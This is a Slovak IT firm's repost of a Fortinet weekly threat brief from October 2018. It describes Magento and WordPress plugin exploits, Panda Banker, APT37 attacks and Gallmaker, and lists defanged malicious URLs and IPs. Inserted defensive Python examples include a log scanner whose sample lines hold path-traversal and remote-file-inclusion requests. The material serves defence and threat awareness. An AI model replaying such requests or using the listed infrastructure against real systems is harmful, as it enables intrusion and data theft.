Aktuálne hrozby podľa Fortinetu za 13. - 19.10. 2018

Thanks to our partner Fortinet, this week we again bring you the report of threats detected during the previous week. You can read the report below in English. If you have any questions, do not hesitate to contact us.

Recognizing and preventing modern cyber scams is difficult. As FortiGuard's Sr. Security Strategist, Ladi Adefala, points out in his blog post, cybercriminals use a wide variety of scam tactics to gain access to your devices and networks to steal information or extort money. It is important to understand the various social engineering tactics that bad actors are using to trick users. Ladi spells out ways you can identify and minimize the impact of cyber scams by learning more about what tactics are being employed.

Cyber scams can affect anybody unaware of these common warning signs. As people continue to adopt devices that connect directly to the internet, the risk of falling victim to a scam increases. By being aware of the common cyber scam tactics that we see targeting people today, as well as recognizing those common telltale signs, you can better safeguard your valuable information.

Fortinet has a variety of security tools that help detect or block scams, depending on the techniques being used. For example, our Web Filtering service blocks and blacklists scam-related URLs; FortiMail leverages our Anti-spam solution; and our award-winning AntiVirus solution can detect scams and block downloads when necessary. For more information on our security services, visit our Security Subscriptions webpage.

Blog: Recognizing and Preventing Modern Cyber Scams

Application Vulnerabilities / IPS

Rank  Name                                                          Prevalence
1     MS.IIS.WebDAV.PROPFIND.ScStoragePathFromUrl.Buffer.Overflow   41,472
2     Dasan.GPON.Remote.Code.Execution                              28,000
3     D-Link.DSL-2750B.CLI.OS.Command.Injection                     27,331
4     Avtech.Devices.HTTP.Request.Parsing.Multiple.Vulnerabilities  23,339
5     Oracle.WebLogic.Server.wls-wsat.Component.Code.Injection      19,591

Magento.eCommerce.Web.Sites.Remote.Code.Execution – Magento is one of the most popular ecommerce platforms in use today, with an estimated install base of over 500,000 sites using it. It is now part of Adobe and provides both free and paid versions of the platform, with a big chunk of Fortune 500 companies using this as their choice of e-commerce framework.

This signature detects attempts to exploit flaws in Magento 1.9.1.0 CE and 1.14.1.0 EE: CVE-2015-1397 (SQL injection), CVE-2015-1398 (multiple directory traversal vulnerabilities), and CVE-2015-1399 (remote file inclusion), which can be chained in an attempt to execute an attacker-controlled payload on a vulnerable web server.

One of the issues arises from a lack of sanitization of URLs that access administrative scripts on the system. Magento can be tricked into executing administrative paths simply by appending "Adminhtml" to the URL (a string that Magento itself appends to the path when an admin user is logged in at the time of the requested action).

If successfully exploited, giving full access to the system, the attacker would be able to grab sensitive customer data such as usernames, passwords and credit card information, as well as other personally identifiable information.

We are seeing attackers leveraging this exploit against sensors in Spain and Australia, with close to 800,000 hits in the last 30 days. At the time of this writing, there was public information on how to exploit this vulnerability as well as proof of concept exploit code for it. 

Signatures: Magento.eCommerce.Web.Sites.Remote.Code.Execution 

WordPress.Multiple.Plugins.CMS.Software.Arbitrary.File.Upload – Several arbitrary remote file upload vulnerabilities exist in multiple WordPress plugin components, such as the mobile and web-app builders. In one of the flaws, the code in the file /server/images.php (other plugins use other paths) neither requires authentication nor checks that the user is allowed to upload content.
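As an added illustration (not the code of any of the plugins named in this brief, and written in Python rather than the plugins' PHP), the checks an upload handler such as the /server/images.php described above must perform before storing a file: authenticate the caller, verify an upload capability, allow-list the final extension, verify the content against the declared type, reject embedded PHP markers, and discard the client-supplied file name. The user record layout, the "upload_files" capability name and the size limit are assumptions made for this example.

```python
import os
import re
import secrets

# Added Python illustration of the checks an upload handler must perform; it is
# not the code of any WordPress plugin. The user record, the "upload_files"
# capability and the 5 MiB limit are assumptions made for this example.

ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

# Leading bytes of each allowed type; the declared extension alone is never trusted.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
MAX_SIZE = 5 * 1024 * 1024
FILENAME_RE = re.compile(r"[A-Za-z0-9_.-]+\.([A-Za-z0-9]+)")


def validate_upload(user, filename, content):
    """Return (True, safe_name) when the upload may be stored, else (False, reason).

    user: None for an anonymous request, otherwise a dict with "authenticated"
    (bool) and "capabilities" (iterable of strings).
    """
    # 1. Authentication and authorization come first; the vulnerable handler in
    #    the brief skipped both.
    if not user or not user.get("authenticated"):
        return False, "authentication required"
    if "upload_files" not in user.get("capabilities", ()):
        return False, "user lacks upload capability"
    # 2. Size limit.
    if not content or len(content) > MAX_SIZE:
        return False, "invalid size"
    # 3. Name: basename only (no traversal), strict character set, and the final
    #    extension must be allow-listed. "shell.php.png" passes this step as
    #    .png and is then caught by the content check below.
    m = FILENAME_RE.fullmatch(os.path.basename(filename))
    if not m:
        return False, "invalid file name"
    ext = m.group(1).lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension .{ext} not allowed"
    # 4. Content must be the declared type and must not carry PHP markers, so an
    #    image/script polyglot is rejected rather than stored.
    if not content.startswith(MAGIC[ext]):
        return False, "content does not match declared type"
    if b"<?php" in content or b"<?=" in content:
        return False, "script markers inside image data"
    # 5. Store under a server-generated name; the client name never reaches disk.
    return True, f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    user = {"authenticated": True, "capabilities": ["upload_files"]}
    print(validate_upload(user, "cat.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 32))
    print(validate_upload(None, "cat.png", b"\x89PNG\r\n\x1a\n"))
    print(validate_upload(user, "shell.php.png", b"<?php echo 1;"))
```

Storing accepted files in a directory where the web server refuses to execute scripts is the complementary control; the checks above stop the upload, that setting limits the damage if one of them is bypassed.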

The vulnerability affects:
1. Zen App Mobile Native <=3.0 (CVE-2017-6104)
2. WordPress Plugin webapp-builder v2.0 (CVE-2017-1002002)
3. WordPress Plugin wp2android-turn-wp-site-into-android-app v1.1.4 (CVE-2017-1002003)
4. WordPress Plugin mobile-app-builder-by-wappress v1.05 (CVE-2017-1002001)
5. WordPress Plugin mobile-friendly-app-builder-by-easytouch v3.0 (CVE-2017-1002000)

If the attack is successful, the uploaded code runs in the context of the httpd process. On top of not validating whether the user may upload at all, the code also does not check whether the upload is executable code or plain data. We are seeing increased telemetry on this signature targeting the U.S. (17.90%), Japan (4.90%) and Taiwan (4.71%).

Signatures: WordPress.Multiple.Plugins.CMS.Software.Arbitrary.File.Upload
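Detection logic for the two signature categories above (the Magento and the WordPress plugin entries), as an added example that is not FortiGuard's signature logic: a small scanner over Apache combined-format access log lines that flags the request patterns the text describes, namely administrative Magento paths reached through the "Adminhtml" string, directory traversal and remote-file-inclusion indicators in the request, and POSTs to a plugin's /server/images.php upload endpoint. The rule for PHP files requested under wp-content/uploads is an additional defender heuristic, not something the brief states. All IP addresses, paths and timestamps in the sample log are constructed for this example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache "combined" access log lines; hosts, paths and timestamps are
# invented for this example and are not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Oct/2018:10:01:12 +0000] "GET /index.php/catalog/product/view/id/5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [15/Oct/2018:10:02:40 +0000] "GET /index.php/Adminhtml/Example/index/?file=http://198.51.100.5/p.txt HTTP/1.1" 200 1200 "-" "python-requests/2.19"
203.0.113.9 - - [15/Oct/2018:10:02:41 +0000] "GET /index.php/Adminhtml/Example/download/?path=..%2F..%2Fapp%2Fetc%2Fconfig.xml HTTP/1.1" 404 300 "-" "python-requests/2.19"
198.51.100.23 - - [15/Oct/2018:10:05:03 +0000] "POST /wp-content/plugins/mobile-app-builder-by-wappress/server/images.php HTTP/1.1" 200 45 "-" "curl/7.58.0"
198.51.100.23 - - [15/Oct/2018:10:05:09 +0000] "GET /wp-content/uploads/2018/10/x.php HTTP/1.1" 200 88 "-" "curl/7.58.0"
203.0.113.12 - - [15/Oct/2018:10:06:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Upload endpoint path named in the brief; other affected plugins use other paths.
UPLOAD_ENDPOINTS = ("/server/images.php",)


def analyse_request(method, target):
    """Return the list of rule names matched by one request (empty if none)."""
    parts = urlsplit(target)
    path = unquote(parts.path)      # single decode; double-encoded input is out of scope here
    low_path = path.lower()
    query = unquote(parts.query)
    hits = []
    # Magento: administrative routes reached through the "Adminhtml" string in the URL.
    if "adminhtml" in low_path:
        hits.append("magento-admin-path")
    # Directory traversal sequences in the path or the query string.
    if "../" in path or "../" in query or "..\\" in path:
        hits.append("directory-traversal")
    # Remote file inclusion: a query value that is itself a URL.
    values = (v for _, v in parse_qsl(parts.query, keep_blank_values=True))
    if any(re.match(r"(?:https?|ftp)://", v, re.I) for v in values):
        hits.append("remote-file-inclusion")
    # WordPress: POST to a plugin's upload script.
    if method == "POST" and "/wp-content/plugins/" in low_path and low_path.endswith(UPLOAD_ENDPOINTS):
        hits.append("wp-plugin-upload-endpoint")
    # Defender heuristic (not from the brief): PHP executed from the uploads directory.
    if "/wp-content/uploads/" in low_path and low_path.endswith(".php"):
        hits.append("php-in-uploads-dir")
    return hits


def scan_log(text):
    """Parse combined-format lines; return (ip, method, target, rules) per flagged request."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rules = analyse_request(m["method"], m["target"])
        if rules:
            alerts.append((m["ip"], m["method"], m["target"], rules))
    return alerts


if __name__ == "__main__":
    for ip, method, target, rules in scan_log(SAMPLE_LOG):
        print(f"{ip} {method} {target} -> {', '.join(rules)}")
```

The rules are deliberately coarse: they are meant for hunting through existing logs after an IPS alert, where a few false positives on administrative traffic are acceptable, not as a replacement for the inline signature.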

 

Malware Activity

Rank  Name                  Prevalence
1     Android/Agent.FJ!tr   9,811
2     Adware/Agent          5,164
3     W32/Agent.AJFK!tr     3,999
4     W32/Injector.EALR!tr  3,675
5     Riskware/CoinHive     3,422

Panda Banker - I'd Rather Bank with a Human – FortiGuard Labs is aware of a reemergence of the nefarious banking Trojan Panda Banker. Discovered by researchers this week, this latest reemergence appears to be targeting Canada, Japan, and the United States. Panda Banker is essentially a variant of the infamous Zeus banking Trojan and is constantly updated by its authors. Its modus operandi is to steal banking information by means of man-in-the-browser (MitB) attacks on a live web session, carried out by injecting malicious code into the browser on the victim machine. Panda Banker sniffs for credit card numbers, bank account details, and other personal information.

What makes Panda Banker dangerous is that it performs cursory checks at run time to determine whether it is running on a real victim machine or in an analysis sandbox, in order to evade analysis and detection. It looks for various forensic and analysis tools, such as network capture tools, debuggers, disassemblers, and other tools used in malware analysis. If it finds any of them, it simply exits and deletes its payload.

Panda Banker then creates copies of itself on the victim machine. Once that is done, the process launches the newly created executable before exiting; the new copy then creates two svchost.exe processes and injects itself into them. It next looks for the process names of commonly used web browsers and, if it finds them, injects a plugin.dll into them to hijack and intercept traffic between the browser and the victim machine. This happens once it identifies a connection to a website specified in its configuration, such as well-known or targeted financial institutions. Multiple layers of obfuscation and encryption make analysis of both the malware itself and its web traffic difficult. Further tricks Panda Banker employs to hinder analysis are the use of a domain generation algorithm (DGA) and of the Mersenne Twister to generate random values.

Signatures: W32/Kryptik.GJUV!tr.ransom, W32/Panda.BUD!tr, W32/Zbot.ADC!tr.spy, W32/GenKryptik.CJRU!tr, W32/Kryptik.GIRS!tr, W32/GenKryptik.CGCC!tr, W32/Kryptik.GATM!tr, W32/Generik.LKEPZGS!tr, W32/Panda.BPX!tr, W32/GenKryptik.CHNI!tr, W32/GenKryptik.CFWA!tr, W32/Panda.BRE!tr, W32/Kryptik.GJQC!tr, W32/Kryptik.GJOP!tr, W32/GenKryptik.CFTK!tr, W32/GenKryptik.CFSX!tr, W32/GenKryptik.CHTQ!tr, W32/Kryptik.GJKE!tr

New Targeted Attacks in Korea Discovered – FortiGuard Labs is aware of targeted attacks occurring in South Korea by Reaper/APT37/ScarCruft/Geumseong121. According to the researchers who discovered them, this group uses multiple techniques to identify potential targets for compromise. Reconnaissance is done on targets identified via KakaoTalk, a messaging platform popular in South Korea. Once reconnaissance is complete, the identified targets are attacked via a two-pronged approach. One prong uses known vulnerabilities in Adobe Flash, notably CVE-2018-4878 (use after free), in conjunction with Hangul Word Processor (HWP) documents, where the embedded Flash file contains an encrypted binary blob that ultimately retrieves the payload from a remote site. The same technique has also been observed in Excel files (XLS + CVE-2018-4878) and in Word documents containing malicious macros. Other Flash vulnerabilities observed in use are CVE-2015-5119 and CVE-2015-0313. Other techniques used are watering hole attacks as well as malicious Android APK files, which appear to be related to KevDroid. An interesting observation is that the malware checks for a specific journalist name, machine name and news institution name, and simply exits if these are not present. Possible false flags were also observed: some of the language used was Romanized Chinese with incorrect usage, which makes attribution difficult.

Signatures: MSIL/Kryptik.EGY!tr, W32/Generic.DUG!tr.bdr, Android/KevDroid.A!tr, MSIL/Agent.SIM!tr, W32/Agent.DUE!tr.dldr

Indicator(s):
hxxp://endlesspaws.com/vog/tan.php?
hxxp://endlesspaws.com/vog/denk.zip
seline[.]co[.]kr/datafiles/CNOOC[.]php
www[.]causwc[.]or[.]kr/board_community01/board_community01/index2[.]php 
www[.]kumdo[.]org/admin/noti/files/iindex[.]php 
www[.]icare[.]or[.]kr/upload/board/index1[.]php
cnjob[.]co[.]kr/data/blog/iindex[.]php
notac[.]co[.]kr/admin/case/iindex[.]php
hxxp://ebsmpi.com/ipin/360/down.php
hxxp://cgalim.com/admin/hr/hr.doc
175[.]45[.]178[.]133

Web Filtering Activity


Gallmaker: New Threat Group in the Middle East and Eastern Europe – The FortiGuard Labs Web Filtering team is aware of a new threat group targeting government, military, and defense sectors, mainly in Eastern Europe and the Middle East. Their attacks are believed to have begun in December 2017, with a spike in April 2018. The actor behind the campaign uses custom malware, living-off-the-land (LotL) tactics, and publicly available hack tools. They also exploit Microsoft Office DDE, typically starting with a spear-phishing email that is followed by a series of steps including remote control of the victim's system and execution of various tools. Specific PowerShell commands that were tracked as suspicious led to this discovery.

The FortiGuard Labs Web Filtering team has blacklisted all the related network IOCs used by Gallmaker.

Indicator(s):
111[.]90[.]149[.]99/o2
94[.]140[.]116[.]124/o2
94[.]140[.]116[.]231/o2
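Both indicator lists in this brief (the Korea targeted-attack list and the Gallmaker list above) are published defanged (hxxp, [.]). The helper below is an added example, not part of the brief: it refangs each indicator, classifies the host as IP address or domain, and produces a deduplicated host and URL blocklist of the kind a web filter or DNS sinkhole consumes. The indicators embedded in it are copied from the two lists above; the function names are the example's own.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Indicators copied from the two lists in the brief, in the defanged form in
# which it publishes them.
RAW_INDICATORS = """
hxxp://endlesspaws.com/vog/tan.php?
hxxp://endlesspaws.com/vog/denk.zip
seline[.]co[.]kr/datafiles/CNOOC[.]php
www[.]causwc[.]or[.]kr/board_community01/board_community01/index2[.]php
www[.]kumdo[.]org/admin/noti/files/iindex[.]php
www[.]icare[.]or[.]kr/upload/board/index1[.]php
cnjob[.]co[.]kr/data/blog/iindex[.]php
notac[.]co[.]kr/admin/case/iindex[.]php
hxxp://ebsmpi.com/ipin/360/down.php
hxxp://cgalim.com/admin/hr/hr.doc
175[.]45[.]178[.]133
111[.]90[.]149[.]99/o2
94[.]140[.]116[.]124/o2
94[.]140[.]116[.]231/o2
"""


def refang(ioc):
    """Undo the common defanging conventions: hxxp -> http, [.] -> ., [:] -> :."""
    s = ioc.strip()
    s = re.sub(r"^hxxps?://", lambda m: "http" + m.group(0)[4:], s, flags=re.IGNORECASE)
    return s.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")


def parse_indicator(raw):
    """Return a dict describing one indicator, or None for blank lines."""
    s = refang(raw)
    if not s:
        return None
    if "://" in s:
        host = urlsplit(s).hostname
        kind = "url"
    else:
        # Scheme-less entries: either a bare host or host/path.
        host, _, rest = s.partition("/")
        kind = "url" if rest else "host"
    if not host:
        return None
    host = host.lower()
    try:
        ipaddress.ip_address(host)
        host_type = "ip"
    except ValueError:
        host_type = "domain"
    return {"indicator": s, "kind": kind, "host": host, "host_type": host_type}


def build_blocklist(text):
    """Group parsed indicators into deduplicated IP, domain and URL lists."""
    entries = [e for e in map(parse_indicator, text.splitlines()) if e]
    return {
        "entries": entries,
        "ips": sorted({e["host"] for e in entries if e["host_type"] == "ip"}),
        "domains": sorted({e["host"] for e in entries if e["host_type"] == "domain"}),
        "urls": [e["indicator"] for e in entries if e["kind"] == "url"],
    }


if __name__ == "__main__":
    bl = build_blocklist(RAW_INDICATORS)
    print("IPs:", bl["ips"])
    print("Domains:", bl["domains"])
    print("URLs:", len(bl["urls"]))
```

Several of the domains are legitimate Korean sites whose pages were apparently compromised to host the payload, so a host-level block on them carries collateral impact; the URL list is the safer unit for those, while the bare IP addresses can be blocked outright.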

Source : https://fortiguard.com/resources/threat-brief/2018/10/19/fortiguard-threat-intelligence-brief-october-19-2018

Why choose us?

Trustworthiness

We have been on the market since 2008, and our trustworthiness is confirmed by partnerships with leading IT companies and, above all, by the many satisfied customers who use our services. We are not newcomers; we know what your IT infrastructure needs and are happy to offer it. Our quality is also attested by the certification of our management systems under the ISO 9001 standard.

Professionalism

Not just anyone can protect the security of your data, so turn to a professional partner. Our extensive experience is backed by the training our employees complete regularly, so that they can always give you sound advice and keep your infrastructure running smoothly and without interruption. We hold 27001 certification, so your data is safe with us.

Efficiency

We do not offer you solutions you do not need just to make money from you. Our goal is not to force on you a robust solution that you would barely use; at the same time, we take the design of the structure seriously, with regard to any plans for your company's growth. Our priority is your satisfaction and the security of your data.

References

Mercedes-Benz Slovakia, s.r.o.
Slovak Telekom, a.s.
Saneca Pharmaceuticals a.s.
Úrad vlády Slovenskej republiky
CNC, a.s.
Trenčianska vodohospodárska spoločnosť a. s.

Contact


ReFoMa, s.r.o.
Dolné Rudiny 1
010 01 Žilina, Slovakia

+421 41/202 88 80 – secretariat
+421 41/202 88 81 – technical support
+421 41/202 88 82 – sales department
Company ID (IČO): 43892345
Tax ID (DIČ): 2022541378
VAT ID (IČ DPH): SK2022541378
District Court Žilina, section Sro, file no. 20197/L

Bank account (IBAN):
SK13 1100 0000 0026 2582 3735